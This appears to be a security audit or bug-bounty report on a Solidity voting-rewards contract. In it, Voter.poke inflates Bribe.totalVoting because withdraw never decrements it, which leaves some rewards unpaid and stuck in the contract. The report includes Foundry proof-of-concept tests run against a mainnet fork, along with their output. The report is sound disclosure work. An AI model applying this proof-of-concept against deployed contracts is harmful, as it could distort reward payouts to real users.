A token owner can call Voter.poke to update the voting power, during the Voter.poke call, the Bribe.totalVoting isn't updated correctly, which results that the Bribe.earned will not calculate the rewards correctly.
Vulnerability Details
While a token owner calls , Voter._reset is called at the beginning of the . In Voter._reset, Bribe.withdraw is called in And Bribe.withdraw is defined
As show above, totalVoting isn't updated in Bribe.withdraw, and the function doesn't call _writeVotingCheckpoint to update the checkpoint.
221 function earned(address token, uint256 tokenId) public view returns (uint256) {
...
242 if (_endIndex >= 0) {
243 for (uint256 i = _startIndex; i <= _endIndex; i++) {
...
254 prevRewards.timestamp = _nextEpochStart;
255 _prevSupply = votingCheckpoints[getPriorVotingIndex(_nextEpochStart + DURATION)].votes; <<<--- totalVoting is used here
256
257 // Prevent divide by zero
258 if (_prevSupply == 0) {
259 _prevSupply = 1;
260 }
261 prevRewards.balanceOf = (cp0.balanceOf * tokenRewardsPerEpoch[token][_nextEpochStart]) / _prevSupply;
262 }
263 }
...
268 uint256 _priorSupply = votingCheckpoints[getPriorVotingIndex(_lastEpochEnd)].votes; <<<--- totalVoting is used here
...
279 return reward;
280 }
So to sum up, during Voter.poke call:
Bribe.withdraw will be called, but within the function Bribe.totalVoting isn't deducting amount
Impact Details
User might receive less reward token after Voter.poke is called, and the unclaimed reward token will stuck in the contract.
References
Add any relevant links to documentation or code
Proof of Concept
Add the following code to src/test/Voting.t.sol, and run
$ FOUNDRY_PROFILE=default forge test --fork-url https://eth-mainnet.alchemyapi.io/v2/$API --fork-block-number 17133822 --mc VotingTest --mt testAliceBribes -vv
[⠊] Compiling...
No files changed, compilation skipped
Ran 2 tests for src/test/Voting.t.sol:VotingTest
[PASS] testAliceBribesNoPoke() (gas: 3532165)
Logs:
token1 earned aura : 50000
token2 earned aura : 50000
[PASS] testAliceBribesPoke() (gas: 3797647)
Logs:
token1 earned aura : 20000
token2 earned aura : 20000
Suite result: ok. 2 passed; 0 failed; 0 skipped; finished in 9.93ms (10.25ms CPU time)
From the output we can see that
in testAliceBribesNoPoke Alice doesn't call Voter.poke, token1 and token2 will get 50000*1e18 aura
in testAliceBribesPoke, Alice calls Voter.poke 3 times, token1 and token2 will get 20000*1e18 aura
function testAliceBribesNoPoke() public {
address Alice = address(0x11001100);
address Bob = address(0x22002200);
uint256 tokenId1 = createVeAlcx(Alice, TOKEN_1, MAXTIME, false);
uint256 tokenId2 = createVeAlcx(Bob, TOKEN_1, MAXTIME, false);
uint256 initialTimestamp = block.timestamp;
address bribeAddress = voter.bribes(address(sushiGauge));
uint256 rewardsLength = IBribe(bribeAddress).rewardsListLength();
// Add BAL bribes to sushiGauge
createThirdPartyBribe(bribeAddress, bal, TOKEN_100K);
address[] memory pools = new address[](1);
pools[0] = sushiPoolAddress;
uint256[] memory weights = new uint256[](1);
weights[0] = 5000;
address[] memory bribes = new address[](1);
bribes[0] = address(bribeAddress);
address[][] memory tokens = new address[][](2);
tokens[0] = new address[](2);
tokens[0][0] = bal;
tokens[0][1] = aura;
hevm.prank(Alice);
voter.vote(tokenId1, pools, weights, 0);
hevm.prank(Bob);
voter.vote(tokenId2, pools, weights, 0);
// Adding a bribe to a gauge should increase the bribes list length
// Should be able to add a bribe at any point in an epoch
hevm.warp(block.timestamp + 6 days);
createThirdPartyBribe(bribeAddress, aura, TOKEN_100K);
hevm.warp(block.timestamp + 8 days);
console2.log("token1 earned aura : ", IBribe(bribeAddress).earned(aura, tokenId1) / 1e18);
console2.log("token2 earned aura : ", IBribe(bribeAddress).earned(aura, tokenId2) / 1e18);
}
function testAliceBribesPoke() public {
address Alice = address(0x11001100);
address Bob = address(0x22002200);
uint256 tokenId1 = createVeAlcx(Alice, TOKEN_1, MAXTIME, false);
uint256 tokenId2 = createVeAlcx(Bob, TOKEN_1, MAXTIME, false);
uint256 initialTimestamp = block.timestamp;
address bribeAddress = voter.bribes(address(sushiGauge));
uint256 rewardsLength = IBribe(bribeAddress).rewardsListLength();
// Add BAL bribes to sushiGauge
createThirdPartyBribe(bribeAddress, bal, TOKEN_100K);
address[] memory pools = new address[](1);
pools[0] = sushiPoolAddress;
uint256[] memory weights = new uint256[](1);
weights[0] = 5000;
address[] memory bribes = new address[](1);
bribes[0] = address(bribeAddress);
address[][] memory tokens = new address[][](2);
tokens[0] = new address[](2);
tokens[0][0] = bal;
tokens[0][1] = aura;
hevm.prank(Alice);
voter.vote(tokenId1, pools, weights, 0);
hevm.prank(Bob);
voter.vote(tokenId2, pools, weights, 0);
hevm.prank(Alice);
voter.poke(tokenId1);
hevm.prank(Alice);
voter.poke(tokenId1);
hevm.prank(Alice);
voter.poke(tokenId1);
// Adding a bribe to a gauge should increase the bribes list length
// Should be able to add a bribe at any point in an epoch
hevm.warp(block.timestamp + 6 days);
createThirdPartyBribe(bribeAddress, aura, TOKEN_100K);
hevm.warp(block.timestamp + 8 days);
console2.log("token1 earned aura : ", IBribe(bribeAddress).earned(aura, tokenId1) / 1e18);
console2.log("token2 earned aura : ", IBribe(bribeAddress).earned(aura, tokenId2) / 1e18);
}
On other side, Bribe.deposit is defined
Then, while calculating the reward in , the function uses votingCheckpoints.votes to calculate the rewards in and
Bribe.deposit will be called in , but this time, Bribe.totalVoting is added amount So Voter.poke function will cause Bribe.totalVoting to increase. Then when calculating the rewards amount in Bribe.earned, Bribe.totalVoting is used, which will result wrong amount of rewards.
